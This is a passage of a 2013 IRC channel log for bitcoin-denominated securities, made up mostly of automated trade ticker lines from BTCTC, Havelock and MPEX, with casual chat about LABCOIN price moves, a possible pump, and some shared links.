BTC [+] Aug 27 03:11:43 [BTCTC] [LABCOIN] 100 @ 0.00349 = 0.349 BTC [+] Aug 27 03:11:44 [BTCTC] [LABCOIN] 100 @ 0.003491 = 0.3491 BTC [+] Aug 27 03:11:45 [BTCTC] [LABCOIN] 50 @ 0.003492 = 0.1746 BTC [+] Aug 27 03:11:46 [BTCTC] [LABCOIN] 200 @ 0.003493 = 0.6986 BTC [+] Aug 27 03:11:47 [BTCTC] [LABCOIN] 200 @ 0.003495 = 0.699 BTC [+] Aug 27 03:11:48 [BTCTC] [LABCOIN] 750 @ 0.003495 = 2.6213 BTC [+] Aug 27 03:11:49 [BTCTC] [LABCOIN] 2000 @ 0.003496 = 6.992 BTC [+] Aug 27 03:11:50 [BTCTC] [LABCOIN] 1000 @ 0.003497 = 3.497 BTC [+] Aug 27 03:11:51 [BTCTC] [LABCOIN] 7500 @ 0.003499 = 26.2425 BTC [+] Aug 27 03:11:52 [BTCTC] [LABCOIN] 30000 @ 0.0035 = 105 BTC [+] Aug 27 03:11:53 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [+] Aug 27 03:15:13 [BTCTC] [LABCOIN] 33 @ 0.003537 = 0.1167 BTC [+] Aug 27 03:15:13 [BTCTC] [LABCOIN] 35 @ 0.003538 = 0.1238 BTC [+] Aug 27 03:15:14 [BTCTC] [LABCOIN] 100 @ 0.00354 = 0.354 BTC [+] Aug 27 03:15:15 [BTCTC] [LABCOIN] 33 @ 0.003551 = 0.1172 BTC [+] Aug 27 03:15:17 [BTCTC] [LABCOIN] 32 @ 0.003554 = 0.1137 BTC [+] Aug 27 03:15:18 [BTCTC] [LABCOIN] 250 @ 0.003565 = 0.8913 BTC [+] Aug 27 03:15:19 [BTCTC] [LABCOIN] 1000 @ 0.003566 = 3.566 BTC [+] Aug 27 03:15:20 [BTCTC] [LABCOIN] 2 @ 0.003568 = 0.0071 BTC [+] Aug 27 03:15:21 [BTCTC] [LABCOIN] 10 @ 0.003569 = 0.0357 BTC [+] Aug 27 03:15:22 [BTCTC] [LABCOIN] 181 @ 0.003598 = 0.6512 BTC [+] Aug 27 03:15:23 [BTCTC] [LABCOIN] 676 @ 0.003599 = 2.4329 BTC [+] Aug 27 03:15:24 [BTCTC] [LABCOIN] 50 @ 0.0036 = 0.18 BTC [+] Aug 27 03:15:24 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [+] Aug 27 03:15:25 [BTCTC] [LABCOIN] 754 @ 0.003629 = 2.7363 BTC [+] Aug 27 03:15:26 [BTCTC] [LABCOIN] 1000 @ 0.00363 = 3.63 BTC [+] Aug 27 03:15:27 [BTCTC] [LABCOIN] 1000 @ 0.00363 = 3.63 BTC [+] Aug 27 03:15:28 [BTCTC] [LABCOIN] 1016 @ 0.003631 = 3.6891 BTC [+] Aug 27 03:15:29 [BTCTC] [LABCOIN] 25 @ 0.003645 = 0.0911 BTC [+] Aug 27 03:15:30 [BTCTC] [LABCOIN] 100 @ 0.003646 = 0.3646 BTC [+] Aug 27 03:15:31 [BTCTC] [LABCOIN] 194 @ 0.003666 = 0.7112 BTC [+] Aug 27 03:15:32 [BTCTC] [LABCOIN] 710 @ 0.003667 = 2.6036 BTC [+] Aug 27 03:15:34 [BTCTC] [LABCOIN] 67 @ 0.003669 = 0.2458 BTC [+] Aug 27 03:15:34 [BTCTC] [LABCOIN] 295 @ 0.00367 = 1.0827 BTC [+] Aug 27 03:15:35 [BTCTC] [LABCOIN] 1182 @ 0.003671 = 4.3391 BTC [+] Aug 27 03:15:36 [BTCTC] [LABCOIN] 85 @ 0.003671 = 0.312 BTC [+] Aug 27 03:16:39 [HAVELOCK] [XBOND] 5 @ 0.00116 = 0.0058 BTC [-] Aug 27 03:17:11 [MPEX] [S.MPOE] 4985 @ 0.00086051 = 4.2896 BTC [+] Aug 27 03:17:12 [MPEX] [S.MPOE] 1265 @ 0.0008625 = 1.0911 BTC [+] Aug 27 03:19:45 [HAVELOCK] [CFIG] 15 @ 0.15 = 2.25 BTC [+] Aug 27 03:20:23 [BTCTC] [LABCOIN] 4 @ 0.003663 = 0.0147 BTC [-] Aug 27 03:21:08 [BTCTC] [LABCOIN] 4 @ 0.003664 = 0.0147 BTC [+] Aug 27 03:21:09 [BTCTC] [LABCOIN] 9 @ 0.003666 = 0.033 BTC [+] Aug 27 03:21:10 [BTCTC] [LABCOIN] 520 @ 0.003668 = 1.9074 BTC [+] Aug 27 03:21:12 [BTCTC] [LABCOIN] 9 @ 0.003668 = 0.033 BTC [+] Aug 27 03:21:36 [BTCTC] [LABCOIN] 60 @ 0.003659 = 0.2195 BTC [-] Aug 27 03:22:52 [BTCTC] [HOSTED-MINING] 1300 @ 0.0028 = 3.64 BTC [+] Aug 27 03:23:29 [MPEX] [S.MPOE] 6300 @ 0.00085705 = 5.3994 BTC [-] Aug 27 03:26:20 [BTCTC] [ACTIVEMINING] 15 @ 0.005295 = 0.0794 BTC [-] Aug 27 03:32:15 [HAVELOCK] [CFIG] 22 @ 0.15 = 3.3 BTC [+] Aug 27 03:34:56 [HAVELOCK] [AM100] 1 @ 0.0256 BTC [+] Aug 27 03:35:11 [HAVELOCK] [AM100] 1 @ 0.0252 BTC [-] Aug 27 03:35:18 [HAVELOCK] [AM100] 1 @ 0.0247 BTC [-] Aug 27 03:35:32 [HAVELOCK] [AM100] 1 @ 0.02466624 BTC [-] Aug 27 03:35:39 [HAVELOCK] [AM100] 1 @ 0.02466624 BTC [-] Aug 27 03:35:53 [HAVELOCK] [CFIG] 1 @ 0.16 BTC [+] Aug 27 03:40:35 [BTCTC] [HOSTED-MINING] 6 @ 0.0028 = 0.0168 BTC [+] Aug 27 03:41:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.02812 = 0.1687 BTC [-] Aug 27 03:42:51 [BTCTC] [LABCOIN] 1 @ 0.003651 BTC [-] Aug 27 03:42:53 [BTCTC] [LABCOIN] 7 @ 0.003652 = 0.0256 BTC [+] Aug 27 03:43:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.02811 = 0.1687 BTC [-] Aug 27 03:43:28 [BTCTC] [NASTY-PT] 10 @ 0.0018 = 0.018 BTC [-] Aug 27 03:43:29 [BTCTC] [NASTY-PT] 1 @ 0.0018 BTC [-] Aug 27 03:43:31 [BTCTC] [NASTY-PT] 107 @ 0.001634 = 0.1748 BTC [-] Aug 27 03:43:32 [BTCTC] [NASTY-PT] 1 @ 0.001633 BTC [-] Aug 27 03:43:33 [BTCTC] [NASTY-PT] 1000 @ 0.001625 = 1.625 BTC [-] Aug 27 03:43:34 [BTCTC] [NASTY-PT] 500 @ 0.0016 = 0.8 BTC [-] Aug 27 03:45:05 [BTCTC] [TAT.ASICMINER] 40 @ 0.02811 = 1.1244 BTC [-] Aug 27 03:45:10 [BTCTC] [BTC-GROWTH] 1 @ 0.1005 BTC [+] Aug 27 03:46:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.02811 = 0.253 BTC [-] Aug 27 03:46:17 [BTCTC] [TAT.ASICMINER] 21 @ 0.0281 = 0.5901 BTC [-] Aug 27 03:47:16 [BTCTC] [LABCOIN] 250 @ 0.003654 = 0.9135 BTC [+] Aug 27 03:49:29 [BTCTC] [LABCOIN] 250 @ 0.003654 = 0.9135 BTC [+] Aug 27 03:51:08 [BTCTC] [LABCOIN] 130 @ 0.003652 = 0.4748 BTC [-] Aug 27 03:52:40 Did something happen with Labcoin or is this another p&d? Aug 27 03:54:17 nothing that I have seen Aug 27 03:54:18 [BTCTC] [LABCOIN] 37 @ 0.003648 = 0.135 BTC [-] Aug 27 03:54:19 [BTCTC] [LABCOIN] 21 @ 0.003649 = 0.0766 BTC [+] Aug 27 03:55:03 News of news is seems? Aug 27 03:55:19 That's all I can find on their thread. Aug 27 03:55:25 [HAVELOCK] [SDSTM] 1 @ 0.004823 BTC [+] Aug 27 03:55:41 [HAVELOCK] [SDSTM] 2 @ 0.0042 = 0.0084 BTC [-] Aug 27 03:55:46 maybe the dump is in march 2016 with a shareprice of 13 btc Aug 27 03:56:04 so what if it is a pump :p Aug 27 03:56:56 nah.. i dunno Aug 27 03:59:11 [BTCTC] [HOSTED-MINING] 1700 @ 0.0028 = 4.76 BTC [+] Aug 27 03:59:31 [MPEX] [S.MPOE] 14800 @ 0.0008625 = 12.765 BTC [+] Aug 27 04:05:25 [BTCTC] [LABCOIN] 250 @ 0.003654 = 0.9135 BTC [+] Aug 27 04:06:02 [BTCTC] [LABCOIN] 24 @ 0.003654 = 0.0877 BTC [+] Aug 27 04:07:33 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [-] Aug 27 04:08:19 [MPEX] [S.MPOE] 10185 @ 0.0008625 = 8.7846 BTC [+] Aug 27 04:08:20 [BTCTC] [DMS.MINING] 24 @ 0.00365 = 0.0876 BTC [+] Aug 27 04:08:22 [MPEX] [S.MPOE] 4745 @ 0.00086428 = 4.101 BTC [+] Aug 27 04:08:52 [BTCTC] [LABCOIN] 300 @ 0.003653 = 1.0959 BTC [-] Aug 27 04:08:53 [BTCTC] [LABCOIN] 729 @ 0.003654 = 2.6638 BTC [+] Aug 27 04:09:04 [BTCTC] [DMS.MINING] 1 @ 0.0037 BTC [+] Aug 27 04:09:23 [BTCTC] [LABCOIN] 20 @ 0.003602 = 0.072 BTC [-] Aug 27 04:09:24 [BTCTC] [LABCOIN] 75 @ 0.003601 = 0.2701 BTC [-] Aug 27 04:10:17 [BTCTC] [DMS.MINING] 7 @ 0.003774 = 0.0264 BTC [+] Aug 27 04:10:18 [BTCTC] [LABCOIN] 20 @ 0.003601 = 0.072 BTC [-] Aug 27 04:11:06 [BTCTC] [LABCOIN] 101 @ 0.0036 = 0.3636 BTC [-] Aug 27 04:11:26 [BTCTC] [LABCOIN] 1282 @ 0.0036 = 4.6152 BTC [-] Aug 27 04:11:54 [BTCTC] [DMS.SELLING] 50 @ 0.01266 = 0.633 BTC [+] Aug 27 04:12:10 [BTCTC] [LABCOIN] 12000 @ 0.0036 = 43.2 BTC [-] Aug 27 04:12:13 [BTCTC] [LABCOIN] 111 @ 0.0036 = 0.3996 BTC [-] Aug 27 04:12:40 [BTCTC] [LABCOIN] 3506 @ 0.0036 = 12.6216 BTC [-] Aug 27 04:18:16 [BTCTC] [DMS.SELLING] 2 @ 0.01267 = 0.0253 BTC [+] Aug 27 04:19:46 [BTCTC] [DMS.PURCHASE] 50 @ 0.01605 = 0.8025 BTC [-] Aug 27 04:20:46 [HAVELOCK] [XBOND] 50 @ 0.00113111 = 0.0566 BTC [-] Aug 27 04:20:54 [HAVELOCK] [XBOND] 700 @ 0.00112501 = 0.7875 BTC [-] Aug 27 04:21:02 [HAVELOCK] [HIM] 5 @ 0.2105 = 1.0525 BTC [+] Aug 27 04:21:12 [HAVELOCK] [XBOND] 250 @ 0.001125 = 0.2813 BTC [-] Aug 27 04:23:04 [BTCTC] [LABCOIN] 5 @ 0.003647 = 0.0182 BTC [+] Aug 27 04:23:05 [BTCTC] [LABCOIN] 20 @ 0.003648 = 0.073 BTC [+] Aug 27 04:23:06 [BTCTC] [LABCOIN] 23 @ 0.003651 = 0.084 BTC [+] Aug 27 04:23:08 [BTCTC] [LABCOIN] 95 @ 0.003652 = 0.3469 BTC [+] Aug 27 04:23:09 [BTCTC] [LABCOIN] 250 @ 0.003654 = 0.9135 BTC [+] Aug 27 04:23:10 [BTCTC] [LABCOIN] 1000 @ 0.003655 = 3.655 BTC [+] Aug 27 04:23:11 [BTCTC] [LABCOIN] 256 @ 0.003667 = 0.9388 BTC [+] Aug 27 04:23:12 [BTCTC] [LABCOIN] 65 @ 0.003668 = 0.2384 BTC [+] Aug 27 04:23:12 [BTCTC] [LABCOIN] 250 @ 0.003669 = 0.9173 BTC [+] Aug 27 04:23:13 [BTCTC] [LABCOIN] 100 @ 0.003669 = 0.3669 BTC [+] Aug 27 04:23:14 [BTCTC] [LABCOIN] 611 @ 0.00367 = 2.2424 BTC [+] Aug 27 04:24:26 [HAVELOCK] [HIM] 17 @ 0.2105 = 3.5785 BTC [+] Aug 27 04:26:06 [BTCTC] [DMS.PURCHASE] 1101 @ 0.01605 = 17.6711 BTC [-] Aug 27 04:26:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [+] Aug 27 04:26:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [+] Aug 27 04:26:27 [BTCTC] [LABCOIN] 813 @ 0.003673 = 2.9861 BTC [+] Aug 27 04:26:56 [BTCTC] [DMS.PURCHASE] 20 @ 0.01605 = 0.321 BTC [-] Aug 27 04:28:48 [BTCTC] [TAT.ASICMINER] 35 @ 0.02864 = 1.0024 BTC [+] Aug 27 04:29:15 [BTCTC] [TAT.MINIGAME] 7 @ 0.00022 = 0.0015 BTC [-] Aug 27 04:41:03 [BTCTC] [RSM] 100 @ 0.0131 = 1.31 BTC [-] Aug 27 04:41:52 [BTCTC] [ACTIVEMINING] 15 @ 0.005289 = 0.0793 BTC [-] Aug 27 04:42:05 [BTCTC] [BTC-GROWTH] 13 @ 0.1005 = 1.3065 BTC [+] Aug 27 04:47:46 [BTCTC] [ASICMINER-PT] 1 @ 2.907 BTC [+] Aug 27 04:48:58 [HAVELOCK] [AM100] 1 @ 0.0282 BTC [+] Aug 27 04:49:08 [BTCTC] [HOSTED-MINING] 50 @ 0.0028 = 0.14 BTC [+] Aug 27 04:50:19 [BTCTC] [HOSTED-MINING] 3 @ 0.0028 = 0.0084 BTC [+] Aug 27 04:51:05 [BTCTC] [LABCOIN] 43 @ 0.003671 = 0.1579 BTC [-] Aug 27 04:51:55 [BTCTC] [ACTIVEMINING] 15 @ 0.005296 = 0.0794 BTC [+] Aug 27 04:51:56 [BTCTC] [ACTIVEMINING] 35 @ 0.005296 = 0.1854 BTC [+] Aug 27 04:52:15 [HAVELOCK] [LABCO] 1 @ 0.00328 BTC [+] Aug 27 04:55:29 [BTCTC] [ACTIVEMINING] 27 @ 0.005294 = 0.1429 BTC [-] Aug 27 04:55:30 [BTCTC] [ACTIVEMINING] 27 @ 0.005295 = 0.143 BTC [+] Aug 27 04:55:31 [BTCTC] [ACTIVEMINING] 50 @ 0.005297 = 0.2649 BTC [+] Aug 27 04:55:31 [BTCTC] [ACTIVEMINING] 6 @ 0.0053 = 0.0318 BTC [+] Aug 27 04:55:45 [BTCTC] [ACTIVEMINING] 1 @ 0.0053 BTC [+] Aug 27 04:56:04 [BTCTC] [ACTIVEMINING] 1 @ 0.005298 BTC [-] Aug 27 04:56:06 [BTCTC] [ACTIVEMINING] 1 @ 0.005299 BTC [+] Aug 27 05:00:20 why did labcoin go up a few days ago? Aug 27 05:00:35 anything concrete? Aug 27 05:00:39 nop. Aug 27 05:02:38 News of news. Aug 27 05:03:07 news of 6th's online within next four weeks Aug 27 05:03:13 th/s Aug 27 05:03:29 supposed to be some more news in the next couple of days Aug 27 05:03:49 th/s is the new gh/s Aug 27 05:04:34 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 27 05:04:54 http://intercaloninterstates.org/ Aug 27 05:04:56 INTERCAL on Interstates Aug 27 05:05:10 [BTCTC] [DMS.PURCHASE] 6 @ 0.01605 = 0.0963 BTC [-] Aug 27 05:05:23 I read that as: Interracial Interstates Aug 27 05:05:32 [BTCTC] [DMS.MINING] 1 @ 0.003748 BTC [-] Aug 27 05:07:20 Diablo-D3!*@* added to ignore list. Aug 27 05:10:06 [HAVELOCK] [CFIG] 2 @ 0.2 = 0.4 BTC [+] Aug 27 05:10:16 [BTCTC] [LABCOIN] 6 @ 0.003669 = 0.022 BTC [-] Aug 27 05:15:14 [BTCTC] [LABCOIN] 470 @ 0.003669 = 1.7244 BTC [-] Aug 27 05:15:58 [BTCTC] [LABCOIN] 10000 @ 0.0019 = 19 BTC [-] Aug 27 05:18:48 wait what? Aug 27 05:19:08 someone misclick a put option? **** BEGIN LOGGING AT Tue Aug 27 14:10:38 2013 Aug 27 14:10:43 -NickServ- You are now identified for mircea_popescu. Aug 27 14:10:51 [BTCTC] [LABCOIN] 30 @ 0.003541 = 0.1062 BTC [-] Aug 27 14:13:21 [BTCTC] [HOSTED-MINING] 3 @ 0.0028 = 0.0084 BTC [+] Aug 27 14:13:32 [HAVELOCK] [CFIG] 1 @ 0.23 BTC [+] Aug 27 14:13:48 soo what's new ? Aug 27 14:14:04 [BTCTC] [HOSTED-MINING] 10 @ 0.0028 = 0.028 BTC [+] Aug 27 14:14:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.02789 = 0.0558 BTC [+] Aug 27 14:15:23 [HAVELOCK] [AM100] 3 @ 0.0248 = 0.0744 BTC [+] Aug 27 14:15:28 [HAVELOCK] [AM100] 1 @ 0.024711 BTC [-] Aug 27 14:15:34 [HAVELOCK] [AM100] 35 @ 0.02471 = 0.8649 BTC [-] Aug 27 14:16:02 [HAVELOCK] [CFIG] 4 @ 0.23 = 0.92 BTC [+] Aug 27 14:16:05 [BTCTC] [LABCOIN] 3 @ 0.003541 = 0.0106 BTC [-] Aug 27 14:16:14 not much mate, just analysing as always Aug 27 14:16:21 yourself? Aug 27 14:17:48 analizing as well. Aug 27 14:18:37 mircea_popescu: what time is it over there? 7pm? Aug 27 14:18:38 [HAVELOCK] [CFIG] 1 @ 0.23 BTC [+] Aug 27 14:18:43 4pm? Aug 27 14:18:46 2 Aug 27 14:18:56 aka "like a baws" Aug 27 14:19:19 [HAVELOCK] [CFIG] 1 @ 0.23 BTC [+] Aug 27 14:19:41 [HAVELOCK] [CFIG] 1 @ 0.23 BTC [+] Aug 27 14:20:00 [HAVELOCK] [CFIG] 1 @ 0.23 BTC [+] Aug 27 14:20:23 gox going a lil crazy hey Aug 27 14:21:14 god bless the dumb money Aug 27 14:21:16 [BTCTC] [LABCOIN] 42 @ 0.003541 = 0.1487 BTC [-] Aug 27 14:24:17 [BTCTC] [COGNITIVE] 1 @ 0.353 BTC [+] Aug 27 14:24:20 i have like 2k btc of puts outstanding. Aug 27 14:24:22 it's ridiculous Aug 27 14:28:52 [BTCTC] [BFMINES] 2 @ 0.0025 = 0.005 BTC [-] Aug 27 14:29:15 [BTCTC] [ACTIVEMINING] 68 @ 0.005269 = 0.3583 BTC [-] Aug 27 14:29:16 [BTCTC] [ACTIVEMINING] 100 @ 0.00527 = 0.527 BTC [+] Aug 27 14:29:16 [BTCTC] [ACTIVEMINING] 100 @ 0.00527 = 0.527 BTC [+] Aug 27 14:29:18 [BTCTC] [ACTIVEMINING] 336 @ 0.005271 = 1.7711 BTC [+] Aug 27 14:30:10 [BTCTC] [BITVPS] 1 @ 0.002401 BTC [-] Aug 27 14:30:37 [BTCTC] [LABCOIN] 1 @ 0.003558 BTC [+] Aug 27 14:31:04 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0011 = 0.0077 BTC [+] Aug 27 14:32:23 [BTCTC] [DMS.MINING] 1 @ 0.00369 BTC [+] Aug 27 14:32:24 [BTCTC] [DMS.MINING] 100 @ 0.0037 = 0.37 BTC [+] Aug 27 14:32:26 [BTCTC] [DMS.MINING] 99 @ 0.0037 = 0.3663 BTC [+] Aug 27 14:32:35 [BTCTC] [LABCOIN] 99 @ 0.003558 = 0.3522 BTC [+] Aug 27 14:32:36 [BTCTC] [LABCOIN] 24 @ 0.003582 = 0.086 BTC [+] Aug 27 14:32:54 [BTCTC] [DMS.PURCHASE] 40 @ 0.01605 = 0.642 BTC [-] Aug 27 14:32:55 [MPEX] [S.MPOE] 15984 @ 0.00087024 = 13.9099 BTC [+] Aug 27 14:32:56 [MPEX] [S.MPOE] 2816 @ 0.00087053 = 2.4514 BTC [+] Aug 27 14:35:27 [BTCTC] [LABCOIN] 120 @ 0.00355 = 0.426 BTC [-] Aug 27 14:36:10 [BTCTC] [LABCOIN] 880 @ 0.00355 = 3.124 BTC [-] Aug 27 14:38:10 [BTCTC] [LABCOIN] 157 @ 0.003582 = 0.5624 BTC [+] Aug 27 14:47:54 [BTCTC] [BTC-GROWTH] 1 @ 0.1005 BTC [+] Aug 27 14:48:12 [HAVELOCK] [AM100] 8 @ 0.0249 = 0.1992 BTC [+] Aug 27 14:48:14 [HAVELOCK] [AM100] 6 @ 0.02480001 = 0.1488 BTC [-] Aug 27 14:48:28 [BTCTC] [LABCOIN] 483 @ 0.003585 = 1.7316 BTC [+] Aug 27 14:49:16 [HAVELOCK] [AM100] 1 @ 0.02480001 BTC [-] Aug 27 14:51:57 [BTCTC] [DMS.SELLING] 15 @ 0.0125 = 0.1875 BTC [-] Aug 27 14:54:13 [BTCTC] [ASICMINER-PT] 1 @ 2.637 BTC [-] Aug 27 14:54:49 [BTCTC] [ASICMINER-PT] 1 @ 2.636 BTC [-] Aug 27 14:55:34 [BTCTC] [BASIC-MINING] 2 @ 0.2201 = 0.4402 BTC [-] Aug 27 14:55:35 [BTCTC] [BASIC-MINING] 8 @ 0.22 = 1.76 BTC [-] Aug 27 14:55:36 [BTCTC] [BASIC-MINING] 1 @ 0.22 BTC [-] Aug 27 14:55:37 [BTCTC] [BASIC-MINING] 1 @ 0.22 BTC [-] Aug 27 14:55:38 [BTCTC] [BASIC-MINING] 8 @ 0.22 = 1.76 BTC [-] Aug 27 14:55:39 [BTCTC] [BASIC-MINING] 1 @ 0.2127 BTC [-] Aug 27 14:55:40 [BTCTC] [BASIC-MINING] 3 @ 0.2103 = 0.6309 BTC [-] Aug 27 14:55:42 [BTCTC] [BASIC-MINING] 8 @ 0.2102 = 1.6816 BTC [-] Aug 27 14:55:43 [BTCTC] [BASIC-MINING] 5 @ 0.2102 = 1.051 BTC [-] Aug 27 14:56:32 [HAVELOCK] [AM100] 10 @ 0.02480001 = 0.248 BTC [-] Aug 27 14:56:44 http://www.theonion.com/articles/let-me-explain-why-miley-cyrus-vma-performance-was,33632/?ref=auto Aug 27 14:56:54 "So, as managing editor of CNN.com, I want our readers to know this: All you are to us, and all you will ever be to us, are eyeballs. The more eyeballs on our content, the more cash we can ask for. Period. And if we’re able to get more eyeballs, that means I’ve done my job, which gets me congratulations from my bosses, which encourages me to put up even more stupid bullshit on the homepage." Aug 27 14:57:12 lol Aug 27 14:57:35 http://trilema.com/2013/sex-in-the-news/ Aug 27 14:57:39 Sex in the news pe Trilema - Un blog de Mircea Popescu. Aug 27 14:57:44 somwhat related. Aug 27 14:58:06 [HAVELOCK] [AM100] 500 @ 0.0247 = 12.35 BTC [-] Aug 27 15:00:01 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 27 15:00:20 [BTCTC] [LABCOIN] 369 @ 0.003592 = 1.3254 BTC [+] Aug 27 15:01:47 [BTCTC] [LABCOIN] 1 @ 0.003592 BTC [+] Aug 27 15:04:25 [HAVELOCK] [AM100] 10 @ 0.02480001 = 0.248 BTC [+] Aug 27 15:07:55 INteresting read mircea_popescu Aug 27 15:08:34 we live in interesting times, it's easy enough to do. Aug 27 15:11:14 [BTCTC] [ACTIVEMINING] 12 @ 0.005278 = 0.0633 BTC [+] Aug 27 15:11:16 [BTCTC] [ACTIVEMINING] 12 @ 0.005279 = 0.0633 BTC [+] Aug 27 15:11:16 [BTCTC] [ACTIVEMINING] 50 @ 0.00528 = 0.264 BTC [+] Aug 27 15:11:17 [BTCTC] [ACTIVEMINING] 104 @ 0.005308 = 0.552 BTC [+] Aug 27 15:11:18 [BTCTC] [ACTIVEMINING] 379 @ 0.005309 = 2.0121 BTC [+] Aug 27 15:11:19 [BTCTC] [ACTIVEMINING] 40 @ 0.005311 = 0.2124 BTC [+] Aug 27 15:11:20 [BTCTC] [ACTIVEMINING] 88 @ 0.005389 = 0.4742 BTC [+] Aug 27 15:11:21 [BTCTC] [ACTIVEMINING] 864 @ 0.00539 = 4.657 BTC [+] Aug 27 15:11:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005396 BTC [+] Aug 27 15:11:24 [BTCTC] [ACTIVEMINING] 200 @ 0.0054 = 1.08 BTC [+] Aug 27 15:11:25 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [+] Aug 27 15:11:26 [BTCTC] [ACTIVEMINING] 238 @ 0.0054 = 1.2852 BTC [+] Aug 27 15:12:01 Indeed. I used to run a program for what we called, "Sexually Maladaptive Youth". Aug 27 15:14:32 [BTCTC] [ASICMINER-PT] 1 @ 2.687 BTC [+] Aug 27 15:14:33 [BTCTC] [ASICMINER-PT] 1 @ 2.688 BTC [+] Aug 27 15:14:56 oh ? Aug 27 15:17:42 [BTCTC] [BASIC-MINING] 1 @ 0.215 BTC [+] Aug 27 15:17:43 [BTCTC] [BASIC-MINING] 1 @ 0.2105 BTC [-] Aug 27 15:17:45 [BTCTC] [BASIC-MINING] 1 @ 0.2101 BTC [-] Aug 27 15:17:46 [BTCTC] [BASIC-MINING] 1 @ 0.21 BTC [-] Aug 27 15:17:47 [BTCTC] [BASIC-MINING] 15 @ 0.21 = 3.15 BTC [-] Aug 27 15:17:48 [BTCTC] [BASIC-MINING] 113 @ 0.21 = 23.73 BTC [-] Aug 27 15:17:50 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0011 = 0.0077 BTC [+] Aug 27 15:17:51 [BTCTC] [TAT.VIRTUALMINE] 161 @ 0.001128 = 0.1816 BTC [+] Aug 27 15:19:45 [BTCTC] [COGNITIVE] 17 @ 0.353 = 6.001 BTC [+] Aug 27 15:20:55 [BTCTC] [COGNITIVE] 5 @ 0.3538 = 1.769 BTC [+] Aug 27 15:20:56 [BTCTC] [COGNITIVE] 1 @ 0.3563 BTC [+] Aug 27 15:20:56 [BTCTC] [COGNITIVE] 13 @ 0.37 = 4.81 BTC [+] Aug 27 15:20:58 [BTCTC] [COGNITIVE] 2 @ 0.3789 = 0.7578 BTC [+] Aug 27 15:20:59 [BTCTC] [COGNITIVE] 10 @ 0.3851 = 3.851 BTC [+] Aug 27 15:21:00 [BTCTC] [COGNITIVE] 18 @ 0.3852 = 6.9336 BTC [+] Aug 27 15:21:01 [BTCTC] [COGNITIVE] 15 @ 0.388 = 5.82 BTC [+] Aug 27 15:22:20 [BTCTC] [COGNITIVE] 5 @ 0.393 = 1.965 BTC [+] Aug 27 15:22:42 [HAVELOCK] [AM1] 1 @ 2.6301 BTC [-] Aug 27 15:23:07 [BTCTC] [LABCOIN] 17 @ 0.003585 = 0.0609 BTC [-] Aug 27 15:23:08 [BTCTC] [LABCOIN] 1 @ 0.003585 BTC [-] Aug 27 15:23:49 [BTCTC] [LABCOIN] 67 @ 0.003582 = 0.24 BTC [-] Aug 27 15:24:21 [HAVELOCK] [AM100] 12 @ 0.0241 = 0.2892 BTC [-] Aug 27 15:24:37 [HAVELOCK] [AM100] 1 @ 0.0238 BTC [-] Aug 27 15:25:18 [BTCTC] [HOSTED-MINING] 35 @ 0.0028 = 0.098 BTC [+] Aug 27 15:26:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.02784 = 0.2784 BTC [-] Aug 27 15:28:12 [HAVELOCK] [SMG] 4 @ 0.00022 = 0.0009 BTC [-] Aug 27 15:28:17 [HAVELOCK] [SMG] 20 @ 0.000215 = 0.0043 BTC [-] Aug 27 15:28:25 [HAVELOCK] [SMG] 20 @ 0.000214 = 0.0043 BTC [-] Aug 27 15:28:28 [HAVELOCK] [XBOND] 1 @ 0.001174 BTC [+] Aug 27 15:28:31 [HAVELOCK] [SMG] 130 @ 0.000214 = 0.0278 BTC [-] Aug 27 15:28:34 [BTCTC] [LABCOIN] 296 @ 0.003582 = 1.0603 BTC [-] Aug 27 15:28:35 [BTCTC] [LABCOIN] 58 @ 0.003541 = 0.2054 BTC [-] Aug 27 15:28:36 [BTCTC] [LABCOIN] 500 @ 0.003509 = 1.7545 BTC [-] Aug 27 15:28:37 [BTCTC] [LABCOIN] 300 @ 0.003506 = 1.0518 BTC [-] Aug 27 15:28:37 [BTCTC] [LABCOIN] 100 @ 0.003501 = 0.3501 BTC [-] Aug 27 15:28:39 [BTCTC] [LABCOIN] 1000 @ 0.0035 = 3.5 BTC [-] Aug 27 15:28:40 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [-] Aug 27 15:28:41 [BTCTC] [LABCOIN] 2495 @ 0.0035 = 8.7325 BTC [-] Aug 27 15:28:42 [HAVELOCK] [LABCO] 2 @ 0.00328 = 0.0066 BTC [+] Aug 27 15:28:44 [BTCTC] [LABCOIN] 100 @ 0.003488 = 0.3488 BTC [-] Aug 27 15:28:45 [BTCTC] [LABCOIN] 703 @ 0.003482 = 2.4478 BTC [-] Aug 27 15:28:46 [BTCTC] [LABCOIN] 549 @ 0.003481 = 1.9111 BTC [-] Aug 27 15:28:48 [HAVELOCK] [SMG] 355 @ 0.0002132 = 0.0757 BTC [-] Aug 27 15:28:57 [HAVELOCK] [SMG] 70 @ 0.00021301 = 0.0149 BTC [-] Aug 27 15:29:08 [HAVELOCK] [SMG] 10 @ 0.000213 = 0.0021 BTC [-] Aug 27 15:29:14 [HAVELOCK] [SMG] 18 @ 0.000213 = 0.0038 BTC [-] Aug 27 15:29:20 [HAVELOCK] [SMG] 128 @ 0.0002125 = 0.0272 BTC [-] Aug 27 15:29:26 [HAVELOCK] [SMG] 35 @ 0.00021204 = 0.0074 BTC [-] Aug 27 15:29:32 [HAVELOCK] [SMG] 50 @ 0.00021202 = 0.0106 BTC [-] Aug 27 15:29:39 [HAVELOCK] [SMG] 113 @ 0.000212 = 0.024 BTC [-] Aug 27 15:29:46 [HAVELOCK] [SMG] 19 @ 0.0002115 = 0.004 BTC [-] Aug 27 15:29:52 [HAVELOCK] [SMG] 358 @ 0.0002111 = 0.0756 BTC [-] Aug 27 15:30:04 [HAVELOCK] [SMG] 20 @ 0.000211 = 0.0042 BTC [-] Aug 27 